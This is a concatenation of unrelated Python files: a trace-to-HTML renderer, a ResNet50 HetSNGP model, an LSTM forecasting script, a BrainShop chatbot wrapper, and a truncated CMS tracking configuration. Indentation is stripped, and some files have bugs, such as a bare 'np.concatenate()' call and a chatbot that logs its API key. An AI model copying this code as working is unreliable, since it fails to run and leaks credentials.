enter_data['inner_scope'] = new_scope
child_depth = depth + 1
child_asc_note = has_asc_note or bool(enter_data.get('note')) or bool(enter_data.get('warn'))
children_trace = []
for child_node in node['children']:
children_trace.extend(self.__parse_node(
child_node, depth=child_depth, thread=thread, has_asc_note=child_asc_note, scope=new_scope
))
# New scope can be added while children parsing
if new_scope in self.shown_scopes:
# Open scope by default if its scope is shown and show action scope
self.shown_scopes.add(scope)
enter_data['opened'] = True
if not self.user.triangles:
return [enter_data] + children_trace
# Closing triangle
exit_data = self.__parse_exit(depth, thread, new_scope)
return [enter_data] + children_trace + [exit_data]
def __parse_statement(self, node, depth, thread, scope):
statement_data = {
'type': node['type'],
'thread': self._html_thread[thread],
'line': self.__get_line(node['line']),
'file': self.trace['files'][node['file']],
'offset': ' ' * (self.tab_length * depth + 1),
'source': self.__parse_source(node),
'display': node.get('display'),
'scope': scope
}
# Add note/warn
if node.get('note'):
if node.get('violation'):
statement_data['warn'] = node['note']
else:
statement_data['note'] = node['note']
# Add assumptions
if self.user.assumptions:
statement_data['old_assumptions'], statement_data['new_assumptions'] = self.__get_assumptions(node, scope)
return statement_data
def __parse_function(self, node, depth, thread, scope):
func_data = self.__parse_statement(node, depth, thread, scope)
func_data['opened'] = False
return func_data
def __parse_action(self, node, depth, thread, scope):
return {
'type': node['type'],
'relevant': node.get('relevant', False),
'thread': self._html_thread[thread],
'line': self.__get_line(node['line']),
'file': self.trace['files'][node['file']],
'offset': ' ' * (self.tab_length * depth + 1),
'display': node['display'],
'scope': scope,
'opened': False
}
def __parse_exit(self, depth, thread, scope):
return {
'type': 'exit',
'line': self.__get_line(),
'thread': self._html_thread[thread],
'offset': ' ' * (self.tab_length * depth + 1),
'scope': scope
}
def __parse_source(self, node):
src_line = SourceLine(node['source'], highlights=node.get('highlight', []), filename='error trace',
line=node['line'])
source_html = src_line.html_code
# Wrap to assume() conditions
if node.get('condition'):
source_html = '<span class="{}">assume</span>({})'.format(self.condition_class, source_html)
return source_html
def __get_line(self, line=None):
line_str = '' if line is None else str(line)
line_offset = ' ' * (self._max_line_len - len(line_str))
return '{0}{1}'.format(line_offset, line_str)
@cached_property
def _html_thread(self):
html_pattern = '{prefix}<span style="background-color:{color};"> </span>{postfix}'
threads_num = len(self._threads)
threads_html = {}
for i, th in enumerate(self._threads):
threads_html[th] = html_pattern.format(
prefix=' ' * i,
color=self.THREAD_COLORS[i % len(self.THREAD_COLORS)],
postfix=' ' * (threads_num - i - 1)
)
threads_html['global'] = ' ' * threads_num
return threads_html
def __get_assumptions(self, node, scope):
if not self.user.assumptions:
return None, None
old_assumptions = None
if scope in self._scope_assumptions:
old_assumptions = '_'.join(self._scope_assumptions[scope])
cnt = len(self.assumptions)
new_assumptions = None
if node.get('assumption'):
new_assumptions = []
self._scope_assumptions.setdefault(scope, [])
for assume in node['assumption'].split(';'):
if assume not in self.assumptions:
self.assumptions[assume] = cnt
cnt += 1
assume_id = str(self.assumptions[assume])
new_assumptions.append(assume_id)
self._scope_assumptions[scope].append(assume_id)
new_assumptions = '_'.join(new_assumptions)
return old_assumptions, new_assumptions
|
<gh_stars>0
# coding=utf-8
# Copyright 2022 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ResNet50 model with HetSNGP."""
import functools
import string
import edward2 as ed
import tensorflow as tf
# Use batch normalization defaults from Pytorch.
BATCH_NORM_DECAY = 0.9
BATCH_NORM_EPSILON = 1e-5
def MonteCarloDropout( # pylint:disable=invalid-name
inputs,
dropout_rate,
use_mc_dropout,
filterwise_dropout):
"""Defines the Monte Carlo dropout layer."""
training = None
noise_shape = None
if use_mc_dropout:
training = True
if filterwise_dropout:
noise_shape = [inputs.shape[0], 1, 1, inputs.shape[3]]
return tf.keras.layers.Dropout(
dropout_rate, noise_shape=noise_shape)(
inputs, training=training)
def make_random_feature_initializer(random_feature_type):
# Use stddev=0.05 to replicate the default behavior of
# tf.keras.initializer.RandomNormal.
if random_feature_type == 'orf':
return ed.initializers.OrthogonalRandomFeatures(stddev=0.05)
elif random_feature_type == 'rff':
return tf.keras.initializers.RandomNormal(stddev=0.05)
else:
return random_feature_type
def make_conv2d_layer(use_spec_norm,
spec_norm_iteration,
spec_norm_bound):
"""Defines type of Conv2D layer to use based on spectral normalization."""
Conv2DBase = functools.partial(tf.keras.layers.Conv2D, padding='same') # pylint: disable=invalid-name
def Conv2DNormed(*conv_args, **conv_kwargs): # pylint: disable=invalid-name
return ed.layers.SpectralNormalizationConv2D(
Conv2DBase(*conv_args, **conv_kwargs),
iteration=spec_norm_iteration,
norm_multiplier=spec_norm_bound)
return Conv2DNormed if use_spec_norm else Conv2DBase
def bottleneck_block(inputs, filters, stage, block, strides, conv_layer,
dropout_layer):
"""Residual block with 1x1 -> 3x3 -> 1x1 convs in main path.
Note that strides appear in the second conv (3x3) rather than the first (1x1).
This is also known as "ResNet v1.5" as it differs from He et al. (2015)
(http://torch.ch/blog/2016/02/04/resnets.html).
Args:
inputs: tf.Tensor.
filters: list of integers, the filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
strides: Strides for the second conv layer in the block.
conv_layer: tf.keras.layers.Layer.
dropout_layer: Callable for dropout layer.
Returns:
tf.Tensor.
"""
filters1, filters2, filters3 = filters
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = conv_layer(
filters1,
kernel_size=1,
use_bias=False,
kernel_initializer='he_normal',
name=conv_name_base + '2a')(
inputs)
x = tf.keras.layers.BatchNormalization(
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '2a')(x)
x = tf.keras.layers.Activation('relu')(x)
x = dropout_layer(x)
x = conv_layer(
filters2,
kernel_size=3,
strides=strides,
padding='same',
use_bias=False,
kernel_initializer='he_normal',
name=conv_name_base + '2b')(
x)
x = tf.keras.layers.BatchNormalization(
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '2b')(x)
x = tf.keras.layers.Activation('relu')(x)
x = dropout_layer(x)
x = conv_layer(
filters3,
kernel_size=1,
use_bias=False,
kernel_initializer='he_normal',
name=conv_name_base + '2c')(
x)
x = tf.keras.layers.BatchNormalization(
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '2c')(x)
shortcut = inputs
if not x.shape.is_compatible_with(shortcut.shape):
shortcut = conv_layer(
filters3,
kernel_size=1,
use_bias=False,
strides=strides,
kernel_initializer='he_normal',
name=conv_name_base + '1')(
shortcut)
shortcut = tf.keras.layers.BatchNormalization(
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '1')(shortcut)
shortcut = dropout_layer(shortcut)
x = tf.keras.layers.add([x, shortcut])
x = tf.keras.layers.Activation('relu')(x)
return x
def group(inputs, filters, num_blocks, stage, strides, conv_layer,
dropout_layer):
"""Group of residual blocks."""
blocks = string.ascii_lowercase
x = bottleneck_block(
inputs,
filters,
stage,
block=blocks[0],
strides=strides,
conv_layer=conv_layer,
dropout_layer=dropout_layer)
for i in range(num_blocks - 1):
x = bottleneck_block(
x,
filters,
stage,
block=blocks[i + 1],
strides=1,
conv_layer=conv_layer,
dropout_layer=dropout_layer)
return x
def resnet50_hetsngp_add_last_layer(
inputs, x, num_classes, num_factors, use_gp_layer, gp_hidden_dim, gp_scale,
gp_bias, gp_input_normalization, gp_random_feature_type,
gp_cov_discount_factor, gp_cov_ridge_penalty,
gp_output_imagenet_initializer, temperature, num_mc_samples, eps,
sngp_var_weight, het_var_weight):
"""Builds ResNet50.
Using strided conv, pooling, four groups of residual blocks, and pooling, the
network maps spatial features of size 224x224 -> 112x112 -> 56x56 -> 28x28 ->
14x14 -> 7x7 (Table 1 of He et al. (2015)).
Args:
inputs: inputs
x: x
num_classes: Number of output classes.
num_factors: Number of factors for the heteroscedastic variance.
use_gp_layer: Whether to use Gaussian process layer as the output layer.
gp_hidden_dim: The hidden dimension of the GP layer, which corresponds to
the number of random features used for the approximation.
gp_scale: The length-scale parameter for the RBF kernel of the GP layer.
gp_bias: The bias term for GP layer.
gp_input_normalization: Whether to normalize the input using LayerNorm for
GP layer. This is similar to automatic relevance determination (ARD) in
the classic GP learning.
gp_random_feature_type: The type of random feature to use for
`RandomFeatureGaussianProcess`.
gp_cov_discount_factor: The discount factor to compute the moving average of
precision matrix.
gp_cov_ridge_penalty: Ridge penalty parameter for GP posterior covariance.
gp_output_imagenet_initializer: Whether to initialize GP output layer using
Gaussian with small standard deviation (sd=0.01).
temperature: Float or scalar `Tensor` representing the softmax
temperature.
num_mc_samples: The number of Monte-Carlo samples used to estimate the
predictive distribution.
eps: Float. Clip probabilities into [eps, 1.0] softmax or
[eps, 1.0 - eps] sigmoid before applying log (softmax), or inverse
sigmoid.
sngp_var_weight: Weight in [0,1] for the SNGP variance in the output.
het_var_weight: Weight in [0,1] for the het. variance in the output.
Returns:
tf.keras.Model.
"""
x = tf.keras.layers.GlobalAveragePooling2D(name='avg_pool')(x)
if use_gp_layer:
gp_output_initializer = None
if gp_output_imagenet_initializer:
# Use the same initializer as dense
gp_output_initializer = tf.keras.initializers.RandomNormal(stddev=0.01)
output_layer = functools.partial(
ed.layers.HeteroscedasticSNGPLayer,
num_factors=num_factors,
num_inducing=gp_hidden_dim,
gp_kernel_scale=gp_scale,
gp_output_bias=gp_bias,
normalize_input=gp_input_normalization,
gp_cov_momentum=gp_cov_discount_factor,
gp_cov_ridge_penalty=gp_cov_ridge_penalty,
scale_random_features=False,
use_custom_random_features=True,
custom_random_features_initializer=make_random_feature_initializer(
gp_random_feature_type),
kernel_initializer=gp_output_initializer,
temperature=temperature,
train_mc_samples=num_mc_samples,
test_mc_samples=num_mc_samples,
share_samples_across_batch=True,
logits_only=True,
eps=eps,
dtype=tf.float32,
sngp_var_weight=sngp_var_weight,
het_var_weight=het_var_weight)
else:
output_layer = functools.partial(
tf.keras.layers.Dense,
activation=None,
kernel_initializer=tf.keras.initializers.RandomNormal(stddev=0.01),
name='fc1000')
outputs = output_layer(num_classes)(x)
return tf.keras.Model(inputs=inputs, outputs=outputs, name='resnet50')
def resnet50_hetsngp(input_shape,
batch_size,
num_classes,
num_factors,
use_mc_dropout,
dropout_rate,
filterwise_dropout,
use_gp_layer,
gp_hidden_dim,
gp_scale,
gp_bias,
gp_input_normalization,
gp_random_feature_type,
gp_cov_discount_factor,
gp_cov_ridge_penalty,
gp_output_imagenet_initializer,
use_spec_norm,
spec_norm_iteration,
spec_norm_bound,
temperature,
num_mc_samples=100,
eps=1e-5,
sngp_var_weight=1.,
het_var_weight=1.,
omit_last_layer=False):
"""Builds ResNet50.
Using strided conv, pooling, four groups of residual blocks, and pooling, the
network maps spatial features of size 224x224 -> 112x112 -> 56x56 -> 28x28 ->
14x14 -> 7x7 (Table 1 of He et al. (2015)).
Args:
input_shape: Shape tuple of input excluding batch dimension.
batch_size: The batch size of the input layer. Required by the spectral
normalization.
num_classes: Number of output classes.
num_factors: Number of factors for the heteroscedastic variance.
use_mc_dropout: Whether to apply Monte Carlo dropout.
dropout_rate: Dropout rate.
filterwise_dropout: Dropout whole convolutional filters instead of
individual values in the feature map.
use_gp_layer: Whether to use Gaussian process layer as the output layer.
gp_hidden_dim: The hidden dimension of the GP layer, which corresponds to
the number of random features used for the approximation.
gp_scale: The length-scale parameter for the RBF kernel of the GP layer.
gp_bias: The bias term for GP layer.
gp_input_normalization: Whether to normalize the input using LayerNorm for
GP layer. This is similar to automatic relevance determination (ARD) in
the classic GP learning.
gp_random_feature_type: The type of random feature to use for
`RandomFeatureGaussianProcess`.
gp_cov_discount_factor: The discount factor to compute the moving average of
precision matrix.
gp_cov_ridge_penalty: Ridge penalty parameter for GP posterior covariance.
gp_output_imagenet_initializer: Whether to initialize GP output layer using
Gaussian with small standard deviation (sd=0.01).
use_spec_norm: Whether to apply spectral normalization.
spec_norm_iteration: Number of power iterations to perform for estimating
the spectral norm of weight matrices.
spec_norm_bound: Upper bound to spectral norm of weight matrices.
temperature: Float or scalar `Tensor` representing the softmax
temperature.
num_mc_samples: The number of Monte-Carlo samples used to estimate the
predictive distribution.
eps: Float. Clip probabilities into [eps, 1.0] softmax or
[eps, 1.0 - eps] sigmoid before applying log (softmax), or inverse
sigmoid.
sngp_var_weight: Weight in [0,1] for the SNGP variance in the output.
het_var_weight: Weight in [0,1] for the het. variance in the output.
omit_last_layer: Optional. Omits the last pooling layer if it is set to
True.
Returns:
tf.keras.Model.
"""
dropout_layer = functools.partial(
MonteCarloDropout,
dropout_rate=dropout_rate,
use_mc_dropout=use_mc_dropout,
filterwise_dropout=filterwise_dropout)
conv_layer = make_conv2d_layer(use_spec_norm=use_spec_norm,
spec_norm_iteration=spec_norm_iteration,
spec_norm_bound=spec_norm_bound)
inputs = tf.keras.layers.Input(shape=input_shape, batch_size=batch_size)
x = tf.keras.layers.ZeroPadding2D(padding=3, name='conv1_pad')(inputs)
# TODO(jereliu): apply SpectralNormalization to input layer as well.
x = tf.keras.layers.Conv2D(
64,
kernel_size=7,
strides=2,
padding='valid',
use_bias=False,
kernel_initializer='he_normal',
name='conv1')(x)
x = tf.keras.layers.BatchNormalization(
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name='bn_conv1')(x)
x = tf.keras.layers.Activation('relu')(x)
x = dropout_layer(x)
x = tf.keras.layers.MaxPooling2D(3, strides=2, padding='same')(x)
x = group(
x, [64, 64, 256],
stage=2,
num_blocks=3,
strides=1,
conv_layer=conv_layer,
dropout_layer=dropout_layer)
x = group(
x, [128, 128, 512],
stage=3,
num_blocks=4,
strides=2,
conv_layer=conv_layer,
dropout_layer=dropout_layer)
x = group(
x, [256, 256, 1024],
stage=4,
num_blocks=6,
strides=2,
conv_layer=conv_layer,
dropout_layer=dropout_layer)
x = group(
x, [512, 512, 2048],
stage=5,
num_blocks=3,
strides=2,
conv_layer=conv_layer,
dropout_layer=dropout_layer)
if omit_last_layer:
return tf.keras.Model(inputs=inputs, outputs=x, name='resnet50')
return resnet50_hetsngp_add_last_layer(
inputs, x, num_classes, num_factors, use_gp_layer, gp_hidden_dim,
gp_scale, gp_bias, gp_input_normalization, gp_random_feature_type,
gp_cov_discount_factor, gp_cov_ridge_penalty,
gp_output_imagenet_initializer, temperature, num_mc_samples, eps,
sngp_var_weight, het_var_weight)
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.metrics import mean_squared_error
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM, Dropout
from math import sqrt
from matplotlib import pyplot
from numpy import array
"""
Created by <NAME> on 7/25/18.
Email : <EMAIL> or <EMAIL>
Website: http://ce.sharif.edu/~naghipourfar
Github: https://github.com/naghipourfar
Skype: mn7697np
"""
# date-time parsing function for loading the dataset
def parser(x):
return pd.datetime.strptime('190' + x, '%Y-%m')
# convert time series into supervised learning problem
def series_to_supervised(data, n_in=1, n_out=1, dropnan=True):
n_vars = 1 if type(data) is list else data.shape[1]
df = pd.DataFrame(data)
cols, names = list(), list()
# input sequence (t-n, ... t-1)
for i in range(n_in, 0, -1):
cols.append(df.shift(i))
names += [('var%d(t-%d)' % (j + 1, i)) for j in range(n_vars)]
# forecast sequence (t, t+1, ..., t+n)
for i in range(0, n_out):
cols.append(df.shift(-i))
if i == 0:
names += [('var%d(t)' % (j + 1)) for j in range(n_vars)]
else:
names += [('var%d(t+%d)' % (j + 1, i)) for j in range(n_vars)]
# put it all together
agg = pd.concat(cols, axis=1)
agg.columns = names
# drop rows with NaN values
if dropnan:
agg.dropna(inplace=True)
return agg
# create a differenced series
def difference(dataset, interval=1):
diff = list()
for i in range(interval, len(dataset)):
value = dataset[i] - dataset[i - interval]
diff.append(value)
return pd.DataFrame(diff)
# transform series into train and test sets for supervised learning
def prepare_data(series, n_test, n_lag, n_seq, n_features):
# extract raw values
raw_values = series.values
supervised = series_to_supervised(raw_values, n_lag, n_seq)
supervised_values = supervised.values
# transform data to be stationary
# diff_series = difference(raw_values, 1)
# diff_values = diff_series.values
# diff_values = diff_values.reshape(len(diff_values), 1)
# rescale values to -1, 1
y_scaler = MinMaxScaler(feature_range=(-1, 1))
scaler = MinMaxScaler(feature_range=(-1, 1))
scaled_values = scaler.fit_transform(supervised_values)
print(scaled_values)
# print(scaled_values.shape)
# scaled_values = scaled_values.reshape(len(scaled_values), 1)
# transform into supervised learning problem X, y
X, y = get_X_y(scaled_values, n_lag, n_seq, n_features, 5)
y_scaler.fit_transform(y)
# split into train and test sets
train, test = scaled_values[0:-n_test], scaled_values[-n_test:]
return scaler, train, test, y_scaler
def get_X_y(data, n_lag, n_seq, n_features, y_col_idx):
y_columns = [n_features * (n_lag) + y_col_idx + n_features * i for i in range(n_seq)]
print(y_columns)
y = data[:, y_columns]
X = np.delete(data, y_columns, axis=1)
X = X.reshape(X.shape[0], 1, X.shape[1])
return X, y
# fit an LSTM network to training data
def fit_lstm(train, n_lag, n_seq, n_batch, nb_epoch, n_neurons):
# reshape training into [samples, timesteps, features]
X, y = get_X_y(train, n_lag, n_seq, n_features, 5)
# design network
model = Sequential()
model.add(LSTM(n_neurons, batch_input_shape=(n_batch, X.shape[1], X.shape[2])))
model.add(Dropout(0.5))
model.add(Dense(y.shape[1]))
model.compile(loss='mean_squared_error', optimizer='adam')
# fit network
model.fit(X, y, epochs=nb_epoch, batch_size=n_batch, verbose=2, shuffle=False, validation_split=0.3)
# for i in range(nb_epoch):
# model.fit(X, y, epochs=1, batch_size=n_batch, verbose=2, shuffle=False)
# model.reset_states()
return model
# make one forecast with an LSTM,
def forecast_lstm(model, X, n_batch):
# reshape input pattern to [samples, timesteps, features]
X = X.reshape(1, 1, -1)
# make forecast
forecast = model.predict(X)
# convert to array
return [x for x in forecast[0, :]]
# evaluate the persistence model
def make_forecasts(model, n_batch, train, test, n_lag, n_seq):
forecasts = list()
X, y = get_X_y(test, n_lag, n_seq, n_features, 5)
for i in range(len(test)):
# X, y = test[i, 0:n_features*(n_lag)], test[i, n_features*(n_lag):]
# make forecast
forecast = forecast_lstm(model, X[i], n_batch)
# store the forecast
forecasts.append(forecast)
return forecasts
# invert differenced forecast
def inverse_difference(last_ob, forecast):
# invert first forecast
inverted = list()
inverted.append(forecast[0] + last_ob)
# propagate difference forecast using inverted first value
for i in range(1, len(forecast)):
inverted.append(forecast[i] + inverted[i - 1])
return inverted
# inverse data transform on forecasts
def inverse_transform(series, forecasts, scaler, n_test):
inverted = list()
for i in range(len(forecasts)):
# create array from forecast
forecast = array(forecasts[i])
# forecast = forecast.reshape(1, len(forecast))
# invert scaling
inv_scale = scaler.inverse_transform([forecast])
inv_scale = inv_scale[0, :]
# invert differencing
# index = len(series) - n_test + i - 1
# last_ob = series.values[index]
# inv_diff = inverse_difference(last_ob, inv_scale)
inverted.append(inv_scale)
return inverted
# evaluate the RMSE for each forecast time step
def evaluate_forecasts(test, forecasts, n_lag, n_seq):
for i in range(n_seq):
actual = [row[i] for row in test]
predicted = [forecast[i] for forecast in forecasts]
rmse = sqrt(mean_squared_error(actual, predicted))
print('t+%d RMSE: %f' % ((i + 1), rmse))
# plot the forecasts in the context of the original dataset
def plot_forecasts(series, forecasts, n_test, n_lag, n_seq, training=False):
pyplot.figure(figsize=(18, 10))
pyplot.plot(series.values, label="real Data", color='blue')
for i in range(len(forecasts)):
if training:
off_s = i
off_e = off_s + len(forecasts[i])
else:
off_s = len(series) - n_test + i - 1
off_e = off_s + len(forecasts[i])
xaxis = [x for x in range(off_s, off_e)]
yaxis = [series.values[off_s]] + forecasts[i] # !!!
# yaxis = forecasts[i]
# print(xaxis, yaxis)
if i == 0:
pyplot.plot(xaxis, yaxis, color='red', label='predicted')
else:
pyplot.plot(xaxis, yaxis, color='red')
pyplot.legend()
pyplot.show()
# load dataset
series = pd.read_csv('./data.csv', header=None)[[i for i in range(1, 7)]]
# configure
n_seq = 2
n_lag = 1
n_test = 10
n_epochs = 20
n_batch = 1
n_neurons = 100
n_features = 6
# prepare data
scaler, train, test, y_scaler = prepare_data(series, n_test, n_lag, n_seq, n_features)
# fit model
model = fit_lstm(train, n_lag, n_seq, n_batch, n_epochs, n_neurons)
# make forecasts
forecasts = make_forecasts(model, n_batch, train, test, n_lag, n_seq)
# print(pd.DataFrame(forecasts))
# inverse transform forecasts and test
forecasts = inverse_transform(series, forecasts, y_scaler, n_test + 2)
actual = [row[n_features*(n_lag):] for row in test]
X, y = get_X_y(test, n_lag, n_seq, n_features, 5)
actual = inverse_transform(series, y, y_scaler, n_test + 2)
np.concatenate()
# evaluate forecasts
evaluate_forecasts(actual, forecasts, n_lag, n_seq)
# training forecasts
train_forecasts = make_forecasts(model, n_batch, train, train, n_lag, n_seq)
train_forecasts = inverse_transform(series, train_forecasts, y_scaler, n_test + 2)
print(pd.DataFrame(train_forecasts).shape)
# plot forecasts
plot_forecasts(series[6], train_forecasts, n_test + 2, n_lag, n_seq, training=True) |
import requests
import pyjokes
from datetime import datetime
from itertools import islice
from .utils import correction
from .errors import BaseError, ArgumentError
URL = "http://api.brainshop.ai/get"
class ChatBot:
def __init__(self, brainid="", apikeyuser="", uiiduser="PythonChatbot", history=False, debug=False):
self.brain = brainid
self.apikey = apikeyuser
self.uiid = uiiduser
self.authorname = "HilFing"
self.link = "https://github.com/hilfing/ChatbotAPI"
self.spelling = False
self.debug = {
'debug': debug,
'history': history
}
self.__debugdata = {
'history': [
],
'logs': [
]
}
self.customdata = []
self.__writelog(["Bot Initialised", "Bot Credentials : " + str(self.getcreds())], "logs")
def getcreds(self):
creds = {
'bid': self.brain,
'key': self.apikey,
'uid': self.uiid
}
return creds
def author(self):
return self.authorname
def link(self):
return self.link
def spellcheck(self, val):
if val is not True or val is not False:
ArgumentError("Value must be boolean")
self.spelling = val
def changename(self, name):
if not name == "":
self.uiid = name
else:
ArgumentError("Incorrect argument passed")
def sendmsg(self, message1):
msg = message1
if self.spelling is True:
x = correction(msg)
if not msg == x:
print("User input autocorrected")
self.__writelog(["Input received", "Spell Check done"], "logs")
self.__writelog(["Input received"], "logs")
data = ""
done = 0
if 'jokes' in msg or 'joke' in msg and done == 0:
data = "Here is a joke : " + pyjokes.get_joke()
done = 1
params = {
'bid': self.brain,
'key': self.apikey,
'uid': self.uiid,
'msg': msg
}
if params['bid'] == "" or params['key'] == "" or params['uid'] == "":
raise BaseError("ChatBot not setup properly!")
elif done == 0:
r = requests.get(url=URL, params=params)
data = r.json()['cnt']
done = 1
if done == 1:
self.__writelog(["Reply Received", "Response status_code = " + str(r.status_code)], "logs")
self.__writelog([msg, data], "history")
return data
else:
raise BaseError("Internal Error!")
def __writelog(self, data, logtype):
if logtype == "history" and self.debug['history'] is True:
self.__debugdata['history'].extend(["User : " + data[0], self.uiid + " : " + data[1]])
elif logtype == "logs" and self.debug['debug'] is True:
self.__debugdata['logs'].append("[" + datetime.now().strftime("%d/%m/%Y %H:%M:%S") + "]")
for i in data:
self.__debugdata['logs'].append(i)
self.__debugdata['logs'].append("")
def printlogs(self, filename="Chatbot.log"):
if self.debug['debug'] is False:
raise BaseError("Debug not enabled while creating bot")
f = open(filename, "w+")
for i in self.__debugdata['logs']:
f.write(i)
f.write("\n")
f.close()
print("Logs written to " + filename)
def gethistory(self, length="all"):
if self.debug['history'] is False:
raise BaseError("History has not been enabled while creating bot")
his_len = len(self.__debugdata['history'])
if length == "all" or length == 0:
length = his_len
if length > his_len or not length % 2 == 0:
raise ArgumentError("Length argument is not even or larger than history length.")
his = self.__debugdata['history']
data = iter(his)
split = [his_len - length, length]
output = [list(islice(data, elem))
for elem in split]
output[1].insert(0, "Here is your History:")
return output[1]
def adddata(self, input, output):
return
# TODO add code
print("ChatBotAPI by HilFing initialised.\nThank you for using this library.\n\n")
|
import FWCore.ParameterSet.Config as cms
###################################################################################
# pp iterative tracking modified for hiOffline reco (the vertex is the one reconstructed in HI)
################################### 4th step: large impact parameter tracking using mixed-triplet seeding
from RecoHI.HiTracking.HITrackingRegionProducer_cfi import *
# Are the following values set to the same in every iteration? If yes,
# why not making the change in HITrackingRegionProducer_cfi directly
# once for all?
hiRegitMuMixedTripletStepTrackingRegionsA = HiTrackingRegionFactoryFromSTAMuonsEDProducer.clone(
MuonSrc = "standAloneMuons:UpdatedAtVtx", # this is the same as default, why repeat?
MuonTrackingRegionBuilder = dict(
vertexCollection = "hiSelectedPixelVertex",
UseVertex = True,
Phi_fixed = True,
Eta_fixed = True,
DeltaPhi = 0.3,
DeltaEta = 0.2,
# Ok, the following ones are specific to MixedTripletStep
Pt_min = 1.3,
DeltaR = 0.5, # default = 0.2
DeltaZ = 0.5, # this give you the length
Rescale_Dz = 4., # max(DeltaZ_Region,Rescale_Dz*vtx->zError())
)
)
hiRegitMuMixedTripletStepTrackingRegionsB = hiRegitMuMixedTripletStepTrackingRegionsA.clone(
MuonTrackingRegionBuilder = dict(Pt_min = 1.5)
)
###################################
from RecoTracker.IterativeTracking.MixedTripletStep_cff import *
# NEW CLUSTERS (remove previously used clusters)
hiRegitMuMixedTripletStepClusters = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepClusters.clone(
oldClusterRemovalInfo = cms.InputTag("hiRegitMuPixelPairStepClusters"),
trajectories = cms.InputTag("hiRegitMuPixelPairStepTracks"),
overrideTrkQuals = cms.InputTag('hiRegitMuPixelPairStepSelector','hiRegitMuPixelPairStep'),
trackClassifier = cms.InputTag(''),
TrackQuality = cms.string('tight')
)
# SEEDING LAYERS A
hiRegitMuMixedTripletStepSeedLayersA = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepSeedLayersA.clone()
hiRegitMuMixedTripletStepSeedLayersA.BPix.skipClusters = cms.InputTag('hiRegitMuMixedTripletStepClusters')
hiRegitMuMixedTripletStepSeedLayersA.FPix.skipClusters = cms.InputTag('hiRegitMuMixedTripletStepClusters')
hiRegitMuMixedTripletStepSeedLayersA.TEC.skipClusters = cms.InputTag('hiRegitMuMixedTripletStepClusters')
# SEEDS A
hiRegitMuMixedTripletStepHitDoubletsA = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepHitDoubletsA.clone(
seedingLayers = "hiRegitMuMixedTripletStepSeedLayersA",
trackingRegions = "hiRegitMuMixedTripletStepTrackingRegionsA",
clusterCheck = "hiRegitMuClusterCheck",
)
hiRegitMuMixedTripletStepHitTripletsA = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepHitTripletsA.clone(
doublets = "hiRegitMuMixedTripletStepHitDoubletsA"
)
hiRegitMuMixedTripletStepSeedsA = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepSeedsA.clone(
seedingHitSets = "hiRegitMuMixedTripletStepHitTripletsA"
)
# SEEDING LAYERS B
hiRegitMuMixedTripletStepSeedLayersB = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepSeedLayersB.clone()
hiRegitMuMixedTripletStepSeedLayersB.BPix.skipClusters = cms.InputTag('hiRegitMuMixedTripletStepClusters')
hiRegitMuMixedTripletStepSeedLayersB.TIB.skipClusters = cms.InputTag('hiRegitMuMixedTripletStepClusters')
hiRegitMuMixedTripletStepHitDoubletsB = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepHitDoubletsB.clone(
seedingLayers = "hiRegitMuMixedTripletStepSeedLayersB",
trackingRegions = "hiRegitMuMixedTripletStepTrackingRegionsB",
clusterCheck = "hiRegitMuClusterCheck",
)
hiRegitMuMixedTripletStepHitTripletsB = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepHitTripletsB.clone(
doublets = "hiRegitMuMixedTripletStepHitDoubletsB"
)
hiRegitMuMixedTripletStepSeedsB = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepSeedsA.clone(
seedingHitSets = "hiRegitMuMixedTripletStepHitTripletsB"
)
# combine seeds
hiRegitMuMixedTripletStepSeeds = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepSeeds.clone(
seedCollections = cms.VInputTag(
cms.InputTag('hiRegitMuMixedTripletStepSeedsA'),
cms.InputTag('hiRegitMuMixedTripletStepSeedsB'),
)
)
# track building
hiRegitMuMixedTripletStepTrajectoryFilter = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepTrajectoryFilter.clone()
hiRegitMuMixedTripletStepTrajectoryFilter.minPt = 1.
hiRegitMuMixedTripletStepTrajectoryFilter.minimumNumberOfHits = 6
hiRegitMuMixedTripletStepTrajectoryFilter.minHitsMinPt = 4
# after each new hit, apply pT cut for traj w/ at least minHitsMinPt = cms.int32(3),
hiRegitMuMixedTripletStepTrajectoryBuilder = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepTrajectoryBuilder.clone(
trajectoryFilter = cms.PSet(
refToPSet_ = cms.string('hiRegitMuMixedTripletStepTrajectoryFilter')
),
minNrOfHitsForRebuild = 6 #change from default 4
)
hiRegitMuMixedTripletStepTrackCandidates = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepTrackCandidates.clone(
src = cms.InputTag('hiRegitMuMixedTripletStepSeeds'),
TrajectoryBuilderPSet = cms.PSet(
